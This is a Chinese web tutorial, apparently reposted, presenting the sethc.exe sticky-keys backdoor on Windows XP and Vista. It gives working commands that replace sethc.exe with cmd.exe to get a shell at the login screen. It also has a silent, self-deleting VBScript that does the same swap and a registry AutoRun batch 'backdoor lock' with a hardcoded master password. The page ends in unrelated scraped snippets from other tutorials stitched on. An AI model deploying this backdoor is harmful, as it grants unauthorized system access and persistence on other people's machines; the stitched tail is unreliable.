变态入侵之有史以来最酷的Windows后门sethc.exe_安全教程

后门原理: 

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。 

XP: 

将安装源光盘弹出(或将硬盘上的安装目录改名) 
cd %widnir%\system32\dllcache 
ren sethc.exe *.ex~ 
cd %widnir%\system32 
copy /y cmd.exe sethc.exe 

VISTA: 

takeown /f c:\windows\system32\sethc.exe 
cacls c:\windows\system32\sethc.exe /G administrator:F 
然后按XP方法替换文件 

在登录界面按5此SHIFT,出来cmd shell,然后…… 

后门扩展: 

复制代码 代码如下:

Dim obj, success   
Set obj = CreateObject("WScript.Shell")   
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)   
success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)   
success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)   
success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)   
success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)   
success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)   

第二句最有意思了.自动应答....以前就遇到过类似的问题 
再更新.加个自删除,简化代码...  

复制代码 代码如下:

On Error Resume Next   
Dim obj, success   
Set obj = CreateObject("WScript.Shell")   
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)   
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)  

后门锁扩展: 
allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证 
用下面的后门锁的方法是 把代码保存为bdlock.bat 
然后修改注册表位置即可 

复制代码 代码如下:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]  
"AutoRun"="bdlock.bat"  

@Echo Off  
title 后门登陆验证  
color a  
cls  
set temprandom=%RANDOM%  
echo 请输入验证码:%temprandom%  
set/p check=  
if "%check%"=="%temprandom%%temprandom%" goto passcheck  
if "%check%"=="%temprandom%" (  
rem 后门服务器验证  
rem 如果没有后门验证服务器请rem注释掉下一行代码  
if exist \192.168.8.8\backdoor$\pass goto passcheck  
)  
echo 验证失败  
pause  
exit  
:passcheck  
echo 验证成功  
If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx  
Set passcmdlock=http://blog.csdn.net/freexploit/  
:allyesno  
Set Errorlevel=>nul  
Echo 请输入验证密码?  
Set password=allyesno Is a pig>nul  
Set/p password=  
rem 万能密码  
if "%password%"=="allyesno is a sb" goto endx  
If %time:~1,1%==0 Set timechange=a  
If %time:~1,1%==1 Set timechange=b  
If %time:~1,1%==2 Set timechange=c  
If %time:~1,1%==3 Set timechange=d  
If %time:~1,1%==4 Set timechange=e  
If %time:~1,1%==5 Set timechange=f  
If %time:~1,1%==6 Set timechange=g  
If %time:~1,1%==7 Set timechange=h  
If %time:~1,1%==8 Set timechange=i  
If %time:~1,1%==9 Set timechange=j  
set/a sum=%time:~1,1%+%time:~1,1%  
Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul   
If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End  
Echo 请联系客服咨询正确密码!&Goto allyesno  
:End  
Set password=>nul  
Set Errorlevel=>nul  
Echo  

:endx  

时间: 2024-09-21 23:36:12

变态入侵之有史以来最酷的Windows后门sethc.exe_安全教程的相关文章

Windows优化大师整理工具使用教程

  电脑使用久了,因为内存的占据越来越大,越来也多,所以运行速度变得越来越慢.想进行电脑的全面提速,首先开展内存数据的优化和提速是非常必要的,而进行内存的优化和提速,又可以分别从优化虚拟内存设置和整理内存碎片来着手.那么对于普通的电脑用户来说,如何才能将虚拟内存设置到最优,又如何才能快速整理内存中的碎片呢?今天,小编就来为大家分享Windows优化大师整理工具使用教程. "Windows优化大师"同时提供有功能强大的虚拟内存设置向导和专业化的内存碎片整理工具,所以使用这款软件来&quo

Windows 8窗口透明化设置教程

  作为新系统,windows8向用户展现了很多新特性,系统扁平化的窗口特效便是其中的一项,虽然有很大的创新与突破,但是用户还是习惯了透明化的窗口,在windows8系统中,可不可以实现窗口的透明化呢?答案是肯定的,一起来看一下具体的操作步骤吧. Windows 8窗口透明化设置教程: 1.在Win8传统桌面右键鼠标,选择"个性化"选项,接着,弹出个性化窗口,点击其中"高对比度主题"中的"高对比度#1". 2.随后,整个界面变成了黑底蓝框样式,接

自带Windows 8笔记本 无损分区教程

  需要工具分区助手5.2绿色版            开学季,很多学生都会去购买笔记本,而预装Windows 系统的笔记本成了很多人的首选.但是这些本本,大部分都是一个C盘,这让很多人烦恼不已!重装系统再分区,稍显麻烦不说,可能会带来其他问题!所以就有了这篇"自带Windows 8笔记本 无损分区教程",不损害原有分区系统甚至是注册激活,直接在C盘中划出D盘.E盘.F盘啥的! 看到分区助手,大家可能会想到什么了!这个是近期新升级的版本,修正了Yoga下修改完启动不了的问题. 右击我们

win7隐藏Windows体验指数的方法教程

  Windows体验指数是反映系统硬件和软件相关工作效率的一个参数,也就是我们所说的跑分功能,该功能由windows系统自动收集评估,通常情况下我们了解一台电脑的性能处理对硬件配置的查看,还需要按该参数来做参照,一般系统评分我们可通过右键电脑属性来查看;不过有些用户想要隐藏该功能,那么应该如何操作呢?下面小编针对该问题为大家带来一种方法技巧,希望对您有所帮助! 由于该功能集成在系统中,我们无法通过传统的选项来关闭,只能使用其它方法将该功能做隐藏,下面我们继续往下看! 隐藏Windows体验指数

超酷的jQuery百叶窗图片滑块实现教程

原文:超酷的jQuery百叶窗图片滑块实现教程 今天我们要来分享一款基于jQuery的百叶窗焦点图插件,也可以说是图片滑块插件.这种jQuery焦点图插件的应用非常广泛,在早些年前,我们需要用flash来完成这种百叶窗的效果.如今我们可以用jQuery来实现这个动画效果.这款jQuery百叶窗焦点图不仅可以横向切换,也可以垂直切换,效果都非常不错. 你也可以在这里查看在线演示 下面我们来简单解说一下实现这款jQuery百叶窗焦点图的过程和代码,代码主要由HTML.CSS以及jQuery组成,实现

Windows 下安装 Oracle 12c 教程

原文 Windows 下安装 Oracle 12c 教程 申明:本文原作者:Jmq   本文给大家带来的是 Oracle 12C 的安装教程.   1.准备 1.1 下载 Oracle 12c 安装程序 下载地址可参考:http://www.wxzzz.com/1231.html 文章可顺利下载.   1.2 解压下载好的两个压缩文件 将两个压缩包解压到同一个目录下,即"database",然后单击解压目录下的"setup.exe"文件: 2.安装过程 2.1.双击

Illustrator路径混合工具绘制超酷炫的标志字体效果制作教程

给各位Illustrator软件的使用者们来详细的解析分享一下路径混合工具绘制超酷炫的标志字体效果制作教程. 教程分享:                   好了,以上的信息就是小编给各位Illustrator的这一款软件的使用者们带来的详细的路径混合工具绘制超酷炫的标志字体效果制作教程解析分享的全部内容了,各位使用者们看到这里小编相信大家现在是非常的清楚了制作方法了吧,那么各位就快去按照小编上面的教程去绘制自己喜欢的标志字体吧.

Windows下tomcat安装图文教程(安装版)_Tomcat

下载tomcat安装文件,官方下载地址是:http://tomcat.apache.org/,本文以tomcat-7.0.26版本为例进行安装过程的说明: Windows下tomcat安装图文教程 1.双击apache-tomcat-7.0.26.exe开始tomcat的安装,见图1. 图1 2.点击Next,进入第二步,同意它的安装协议条款,见图2,点击I Agree继续安装. 图2 3.选择安装选项,默认是Normal,可以看图3,点开Tomcat,选中Service,以后将可以在管理的服务

录酷声音与视频不同步解决教程

  录酷音视频不同步的解决方法: 请注意录完后录酷下方的"流畅度"(如首图): 如果该数值低于70%,则说明机器性能跟不上了,有可能导致音视频不同步,请尝试调低FPS.画质.分辨率等录像参数; 但如果该数值高于70%, 仍然不同步,则很可能是播放器的问题,请尝试用系统自带的Windows Media Player播放,或上传到视频网站上验证. 录酷软件介绍: 录酷游戏录像软件(Lukool Recorder, 原LiveRecorder)是一款可以对游戏.视频或屏幕录像并直播的软件,不